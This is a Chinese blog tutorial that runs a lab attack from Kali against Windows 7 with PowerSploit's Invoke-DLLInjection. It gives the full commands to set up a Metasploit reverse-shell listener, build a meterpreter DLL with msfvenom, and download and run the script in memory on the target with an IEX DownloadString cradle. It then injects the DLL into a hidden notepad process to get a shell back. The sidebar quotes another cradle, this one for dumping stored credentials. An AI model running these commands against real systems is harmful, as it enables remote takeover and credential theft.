使用Invoke-DLLInjection进行powershell的DLL注入

最新推荐文章于 2024-05-20 17:20:00 发布
最新推荐文章于 2024-05-20 17:20:00 发布
阅读量243 收藏 4
点赞数 3
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74824886/article/details/138042496
版权
环境

攻击机 kali ip 192.168.64.129

靶机 win7 ip 192.168.64.143

PowerSploit是一款基于PowerShell的后渗透(Post-Exploition)框架软件,包含很多PowerShell攻击脚本,它们主要用于渗透中的信息侦查、权限提升、权限维持。其GitHub地址为:GitHub - PowerShellMafia/PowerSploit: PowerSploit - A PowerShell Post-Exploitation Framework

1、PowerSploit的安装

首先kali下载PowerSploit,首先输入git命令下载程序目录

git clone https://github.com/PowerShellMafia/PowerSploit

接着输入开启Apache服务

service apache2 start

/etc/init.d/apache2 start

把下载好的文件夹移动到var/www/html目录,打开http://192.168.64.143/PowerSploit/,如下图所示。

2.Invoke-DLLInjection介绍


Code Execution 模块下的脚本 Invoke-DLLInjection,是一个DLL注入脚本

DLL注入是指向运行中的其他进程强制插入特定的DLL文件。其工作原理是从外部促使目标进程调用LoadLibrary() API从而强制执行DLL的DllMain()函数,而且被注入的DLL拥有目标进程内存的访问权限,用户可以随意操作。与一般的DLL加载的区别在于,DLL注入加载的目标进程是其自身或其他进程。

3.开启msf监听

LHOST为攻击机即kali的IP地址,不然会监听失败

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set LHOST 192.168.101.46

run

4.使用msfvenom生成dll文件
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.64.129 lport=4444 -f dll -o /var/www/html/test.dll

 

5. 在目标机器下载Invoke-DllInjection.psl脚本
IEX (New-Object Net.WebClient).DownloadString("http://192.168.64.129/PowerSploit/CodeExecution/Invoke-DllInjection.ps1")
6. 把生成的test.dll上传到目标服务器的C盘

把生成的test.dll复制到目标服务器的C盘的win目录下,就能启动一个新的进程进行DLL注入,这样可以使注入更加隐蔽。

7. 使用以下命令新建一个名为notepad.exe的隐藏进程并获取notepad的进程号
 Start-Process c:\windows\system32\notepad.exe -WindowStyle Hidden
 Get-Process -Name notepad

8. 使用以下命令进行注入
 Invoke-DllInjection -ProcessID 216 -Dll c:\win\test.dll

9. 返回MSF监听界面,发现已经反弹成功

参考

使用powersploit的Invoke-DLLInjection进行DLL注入_dlt injection.-CSDN博客

Powersploit的安装及脚本攻击实战 - zhengna - 博客园 (cnblogs.com)

诶嘿哈哈哈哈哈哈
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Invoke-WCMDump结合powershell进行密码获取
03-26
Ivoke-WCMDump 什么是Credential Manager...powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/peewpw/Invoke-WCMDump/master/Invoke-WCMDump.ps1');Invoke-WCMDump
使用powersploit的Invoke-DLLInjection进行DLL注入
u013930899的博客
05-08 980
1. Invoke-DLLInjection 使用Code Execution模块Invoke-DLLInjection,是一个DLL注入的脚本 2. 在目标机器下载Invoke-DllInjection.psl脚本 IEX (New-Object Net.WebClient).DownloadString("http://192.168.101.46/PowerSploit/ CodeExecution/Invoke-DllInjection.ps1") 3...
PowerSploit 之 Invoke-DllInjection
weixin_46104215的博客
11-08 332
DLL(Dynamic Link Library 可由多个程序同时使用的代码和数据的库):库文件,提供给使用者一些开箱即用的变量、函数或类。库文件分为静态库和动态库,静态库和动态库的区别体现在程序的链接阶段:静态库在程序的链接阶段被复制到了程序中;动态库在链接阶段没有被复制到程序中,而是程序在运行时由系统动态加载到内存中供程序调用。使用动态库系统只需载入一次,不同的程序可以得到内存中相同的动态库的副本,因此节省了很多内存,而且使用动态库也便于模块化更新程序。 静态链接库与动态链接库都是共享代码的方式,如果
Kali渗透测试:远程控制被控端免杀及DLL生成、注入反弹
Liu_Bruce的博客
05-09 3556
Kali渗透测试:远程控制被控端免杀及DLL生成、注入反弹 ​ 长期以来,杀毒软件厂商和黑客一直处于博弈的状态,杀毒软件厂商研究了各种检测和清除远程控制被控端的方法,而黑客也在一直致力于研究避开检测的方法(简称为免杀技术)。远程控制被控端也可被看作病毒的一种。 ​ 到目前为止,杀毒软件主要使用了3种技术。如下: 基于文件扫描的反病毒技术。这种技术主要依靠对程序的二进制代码进行检测,反病毒工程师将病毒样本中的一段特有的二进制代码串提取出来作为特征码,并将其加入病毒库,检测程序时看它是否包含这个特征码。 基于
powershell渗透基础
qq_46804551的博客
04-30 1246
一旦攻击者可以在一台计算机上运行代码,就会下载powershell脚本文件(.ps1)到磁盘中 执行,甚至无需写到磁盘中执行,它可以直接在内存中运行,利用诸多特点攻击者可以持续攻击而不被轻易发现。 常用的powershell攻击工具有以下几种: powerSploit: 常用于信息探测,权限提升,凭证窃取,持久化等操作 Nishang: 基于powershell的渗透测试专用工具,集成了框架,脚本和各种payload,包含下载和执行,键盘记录,DNS,延时命令等脚本 Empire: 基于powe
invoke-atomicredteam:Invoke-AtomicRedTeam是一个PowerShell模块,用于执行[atomics文件夹](https
04-30
Invoke-AtomicRedTeam是一个PowerShell模块,用于执行Red Canary的Atomic Red Team项目的中定义的测试。 “ atomics文件夹”包含定义的每种技术的文件夹。 在每个“ T#”文件夹中,您都会找到一个yaml文件,该文件...
Invoke-QRadarAPI:Powershell模块,可用于使用QRadar API执行多种功能
04-17
一个Powershell模块,可用于使用QRadar REST API执行多种功能 这些功能已在Qradar Community Edition 7.3.3上进行了测试。 更新资产 获取带有要更新的资产属性列表的csv文件,然后在QRadar中应用更改。 获取日志源 ...
PowerShell使用curl(Invoke-WebRequest)的方法教程
01-10
PowerShell能干什么呢?PowerShell首先是个Shell,定义好了一堆命令与操作系统,特别是与文件系统交互,能够启动应用程序,甚至操纵应用程序;第二,PowerShell允许将几个命令组合起来放到文件里执行,实现文件级的...
Invoke-SocksProxy:使用Powershell的袜子代理和反向袜子服务器
05-04
例子当地的在端口1080上创建Socks 4/5代理: Import-Module .\Invoke-SocksProxy.psm1Invoke-SocksProxy -bindPort 1080将最大线程数从200增加到400 Import-Module .\Invoke-SocksProxy.psm1Invoke-SocksProxy -...
一表捋清网络安全等级保护测评要求
weixin_45840241的博客
05-15 570
对于中小企事业单位来说,网络安全建设是一个复杂且投入较高的过程,因此他们更倾向于寻找一种“省心省力”的等保建设方案,以及一种能够持续有效且具有较高性价比的网络安全建设投入方式。通过采用等保一体机方案,客户能够根据自身需求定制所需的安全能力,例如等保二级能力与行为管理能力的结合,等保三级能力与远程安全接入能力的结合等。等保安全套餐方案一直致力于构建“一站式省时省力过等保,安全有效且具有高性价比”的优势,以更好地满足中小企事业单位的网络安全建设需求。导致的安全设备闲置或无法满足等保要求等。
web安全之登录框渗透骚姿势,新思路
qq_47289634的博客
05-10 594
越权漏洞的挖掘大部分是通过对比两个用户的请求包以及响应包,来观察不同之处,有的时候替换一下响应包就直接越权,其中特别要关注的是uid,这里在挖掘逻辑漏洞和越权漏洞时建议使用burp中的compare模块进行两个数据包的比对,非常直观。width=500&height=100导致可以随意更改大小,配合脚本批量请求,很容易就会把带宽占满,造成dos攻击。不管漏洞挖掘还是挖SRC,登录框都是重点关注对象,什么漏洞都有可能出现,登录框也是框,见框就插就对了,说不定会有奇效。看到登录框,输入信息后,抓包。
网站有存在哪些类型的漏洞,网站漏洞存在哪些危害,该怎么解决网站漏洞问题
dexunyun的博客
05-14 366
通过使用漏洞扫描VSS服务,我们可以及时发现网站存在的漏洞,有效降低网站漏洞的风险,保障网站安全,满足合规要求。文件上传漏洞是由于网站在处理文件上传功能时没有对上传的文件类型、大小等进行严格的验证和过滤,攻击者利用网站中的文件包含函数,将恶意文件或代码包含到网站中,从而实现远程代码执行或文件读取。网站安全是一个持续的过程,需要我们不断关注,通过及时发现存在的漏洞,我们可以针对性的处理,这样可以有效地减少网站安全漏洞的产生和危害,确保网站的安全稳定运行。同时,采用安全的编程语言和框架,减少漏洞的产生。
Upstream最新发布2024年汽车网络安全报告-百度网盘下载
最新发布
qq_18209847的博客
05-20 197
Levy总结道:“在负责保护车队、电动汽车充电站和基础设施的网络安全利益相关者中,对汽车网络安全的重要性日益增加。特别是在GenAI日益普及的情况下,其降低了黑帽子行为者的进入门槛,使他们能够比以往更快、更有效地进行大规模攻击。这份报告的第六版着重介绍了汽车网络安全的拐点:从实验性的黑客攻击发展到规模庞大的攻击,并产生了怎样的影响。另外今年的报告还提供了关于网络攻击的财务影响的独到见解,它提供了一个可操作的框架,用于在现实场景中衡量网络攻击的货币影响。
了解网络安全行业内有哪些公司?
aheyor的博客
05-14 922
https://wenku.baidu.com/view/8de38c790440be1e650e52ea551810a6f424c80f?aggId=f2f58cc8e618964bcf84b9d528ea81c758f52ecc&fr=catalogMain_text_ernie_recall_feed_index%3Awk_recommend_main4&_wkts_=1715651666515&bdQuery=%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85
【实事】——《2024网络安全报告》
weixin_65728773的博客
05-14 620
尽管如此,我们也必须做出改变,否则就会像2023年所看到的那样,领先的企业提早采用新技术,落后的企业努力跟上信任和安全基础能力的步伐,以及网络生态系统内分散的激励机制,这些都将在未来几年加速数字鸿沟。在低收入的企业中,有52%的领导者表示,缺乏资源和技能是他们在设计网络弹性时面临的最大挑战。56%的领导者表示,在未来两年内,生成式人工智能将成为网络攻击者的工具。在不断变化的网络安全环境中,地缘政治的不稳定性、技术的飞速发展以及企业网络能力差距的日益扩大,都强化了建立网络弹性和实现系统化全球协作的必要性。
CTF如何学习?
小司机的奥拓
05-14 917
作和项目会带来影响,毕竟你不可能打一辈子的CTF,而CTF和实战还是有区别,过度沉浸于CTF的模式当中会让你在实战中却无从下手**
“网络安全新纪元:等保2.0的详细解读与实践”
2403_84237550的博客
05-14 506
等保2.0的发布是我国网络安全等级保护制度的重要进展,对未来我国网络安全事业发展具有重要的意义。未来,等保2.0将不断完善和更新,以适应不断变化的网络安全威胁和挑战。同时,企业和组织应该积极响应等保2.0的要求,加强网络安全防护和管理,提升网络安全意识和能力,以保障自身业务的安全和稳定发展。网络安全等级保护基本要求》(等保2.0)于2019年6月发布,是我国网络安全等级保护制度的一项重要标准。等保2.0主要针对关键信息基础设施的网络安全保护,对数据安全和个人信息保护提出了更高的要求。
web安全学习笔记(18)
m0_58875569的博客
05-18 598
记一下第31-32节课的内容。未授权访问漏洞;逻辑漏洞之任意用户密码重置的7种常用姿势
invoke-custom 指令是什么
06-12
invoke-custom 是 Java 虚拟机中一种比较特殊的指令,它是用于实现动态语言和函数式编程语言的重要机制之一。...这也就是为什么在低于 Android O 的版本上使用 invoke-custom 指令会导致错误的原因。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值